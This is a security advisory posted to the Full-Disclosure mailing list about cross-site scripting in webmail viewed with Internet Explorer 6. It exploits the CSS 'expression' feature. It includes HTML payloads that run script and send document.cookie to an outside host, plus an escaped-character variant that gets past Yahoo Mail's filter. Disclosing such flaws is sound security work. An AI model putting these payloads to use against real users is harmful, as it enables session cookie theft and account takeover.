Webmails (including Yahoo) + IE 6 = XSS

[Jedi/Sector One <j () pureftpd org>]

  Internet Explorer has an useless feature that allows evaluation of
Javascript expressions in style sheets through the "expression" keyword.

  It allows execution of arbitrary javascript as soon as an HTML message is
read in older versions of Outlook and in most webmail systems filtering
<script> tags :

<html>
<body>
<style type="text/css">
h1 {
  height:expression(alert(42));
  background-image:expression('url(http://example.org/'+document.cookie+&apos;)');
}
</style>
<h1>...</h1>
</body>
</html>

  Yahoo! mail has a filter against this, that replaces "expression" with
"_expression".

  Unfortunately, this filter is easy to bypass using escaped characters that
are valid CSS and that are properly handled by IE 6.

<html>
<body>
<style type="text/css">
h1 {
  he\ight:e\xpression(alert(42));
  bac\kground-image:e\xpression('url(http://example.org/'+document.cookie+&apos;)');
}
</style>
<h1>...</h1>
</body>
</html>

  Workaround until all existing webmail software is fixed (...) : disable
Javascript and/or use any other web browser that focuses on W3C compliance
instead of implementing insecure bloat.

-- 
 __  /*-      Frank DENIS (Jedi/Sector One) <j () 42-Networks Com>     -*\  __
 \ '/    <a href="http://www.PureFTPd.Org/";> Secure FTP Server </a>    \' /
  \/  <a href="http://www.Jedi.Claranet.Fr/";> Misc. free software </a>  \/

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html